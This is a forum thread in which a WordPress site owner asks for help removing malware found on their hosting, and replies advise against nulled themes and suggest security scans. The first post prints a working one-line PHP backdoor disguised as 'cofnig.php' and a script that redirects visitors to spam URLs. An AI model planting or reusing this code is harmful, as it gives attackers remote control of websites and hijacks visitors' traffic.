Need Help, Backdoor in hosting...

Mike420

Junior Member
Joined
Apr 13, 2013
Messages
145
Reaction score
30
Hi ,

Today i looked at one hosting and found some really fucked up code in some new files.

Someone is trying to make money from my new wordpress site without any visitors :D

Did a little search and found that its an backdoor.

But didnt find info how to remove this shit, there must be some more files...

Any help welcome...

cofnig.php
PHP:
<?php @array_diff_ukey(@array((string)$_REQUEST['password']=>1),@array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); ?>

were.php - his money making links.....
PHP:
<?php


$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$android_urls = array (
            'http://com-gem.net/rmpm.php?a=298712&c=wl_con&s=09AND',
            'http://com-d5k.net/uzc.php?a=298712&c=wl_con&s=09AND',    
            'http://com-2a4.net/ttb.php?a=298712&c=wl_con&s=09AND',                
);
$not_android_urls = array (
            'http://com-gem.net/htbtp.php?a=314759&c=wl_con&s=09NR',
            'http://com-d5k.net/adde.php?a=314759&c=wl_con&s=09NR',
            'http://com-2a4.net/amz.php?a=314759&c=wl_con&s=09NR',        
);
 $n = mt_rand(0,count($not_android_urls)-1);
 $rand_url=$not_android_urls[$n];
 
if ( $android  == true)
{
 $n = mt_rand(0,count($android_urls)-1);
 $rand_url=$android_urls[$n];
}
?>
 <meta http-equiv="refresh" content="2; url=<?php echo $rand_url;?> ">
 
download a security plugin that will search for malware.
or maybe just purchase the theme instead of downloading nulled ones.
 
Thanks.

This plugin wont find nothing.

The thing is i have many domains and all of them have this shit..

I need to change root,mysql,ftp, wp passwords ?

And if there is still some file hidden i quess there is no point of changing passwords.
 
Got it right , my hosting made some exploit scan and removed this shit.

Stay away from nulled themes, virus and exploit scanners cant always find these things
 
fiverr has guys that will do a security audit on your server plus remove the malicious scripts for you.
 
Back
Top